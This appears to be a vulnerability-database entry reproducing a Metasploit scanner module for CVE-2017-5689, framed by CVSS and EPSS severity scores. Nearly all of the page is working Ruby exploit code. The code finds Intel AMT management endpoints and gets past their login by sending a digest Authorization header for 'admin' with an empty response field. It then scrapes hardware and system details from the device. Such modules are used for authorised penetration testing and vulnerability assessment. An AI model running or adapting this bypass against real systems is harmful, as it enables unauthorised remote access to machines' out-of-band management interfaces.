9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
10 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
0.974 High
EPSS
Percentile
99.9%
This module scans for Intel Active Management Technology endpoints and attempts to bypass authentication using a blank HTTP digest (CVE-2017-5689). This service can be found on ports 16992, 16993 (tls), 623, and 624 (tls).
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'Intel AMT Digest Authentication Bypass Scanner',
'Description' => %q{
This module scans for Intel Active Management Technology endpoints and attempts
to bypass authentication using a blank HTTP digest (CVE-2017-5689). This service
can be found on ports 16992, 16993 (tls), 623, and 624 (tls).
},
'Author' => 'hdm',
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2017-5689' ],
[ 'URL', 'https://www.embedi.com/news/what-you-need-know-about-intel-amt-vulnerability' ],
[ 'URL', 'https://www.intel.com/content/www/us/en/security-center/default.html?intelid=INTEL-SA-00075&languageid=en-fr' ],
],
'DisclosureDate' => 'May 05 2017'
)
register_options(
[
Opt::RPORT(16992),
])
end
# Fingerprint a single host
def run_host(ip)
begin
connect
res = send_request_raw({ 'uri' => '/hw-sys.htm', 'method' => 'GET' })
unless res && res.headers['Server'].to_s.index('Intel(R) Active Management Technology')
disconnect
return
end
vprint_status("#{ip}:#{rport} - Found an Intel AMT endpoint: #{res.headers['Server']}")
unless res.headers['WWW-Authenticate'] =~ /realm="([^"]+)".*nonce="([^"]+)"/
vprint_status("#{ip}:#{rport} - AMT service did not send a valid digest response")
disconnect
return
end
realm = $1
nonce = $2
cnonce = Rex::Text.rand_text(10)
res = send_request_raw(
{
'uri' => '/hw-sys.htm',
'method' => 'GET',
'headers' => {
'Authorization' =>
"Digest username=\"admin\", realm=\"#{realm}\", nonce=\"#{nonce}\", uri=\"/hw-sys.htm\", " +
"cnonce=\"#{cnonce}\", nc=1, qop=\"auth\", response=\"\""
}
})
unless res && res.body.to_s.index("Computer model")
vprint_error("#{ip}:#{rport} - AMT service does not appear to be vulnerable")
return
end
proof = res.body.to_s
proof_hash = nil
info_keys = res.body.scan(/<td class=r1><p>([^\<]+)(?:<\/p>)?/).map{|x| x.first.to_s.gsub("/", "/") }
if info_keys.length > 0
proof_hash = {}
proof = ""
info_vals = res.body.scan(/<td class=r1>([^\<]+)</).map{|x| x.first.to_s.gsub("/", "/") }
info_keys.each do |ik|
iv = info_vals.shift
break unless iv
proof_hash[ik] = iv
proof << "#{iv}: #{ik}\n"
end
end
print_good("#{ip}:#{rport} - Vulnerable to CVE-2017-5689 #{proof_hash.inspect}")
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:type => 'intel.amt.system_information',
:data => proof_hash
)
report_vuln({
:host => rhost,
:port => rport,
:proto => 'tcp',
:name => "Intel AMT Digest Authentication Bypass",
:refs => self.references,
:info => proof
})
rescue ::Timeout::Error, ::Errno::EPIPE
ensure
disconnect
end
end
end
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
10 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
0.974 High
EPSS
Percentile
99.9%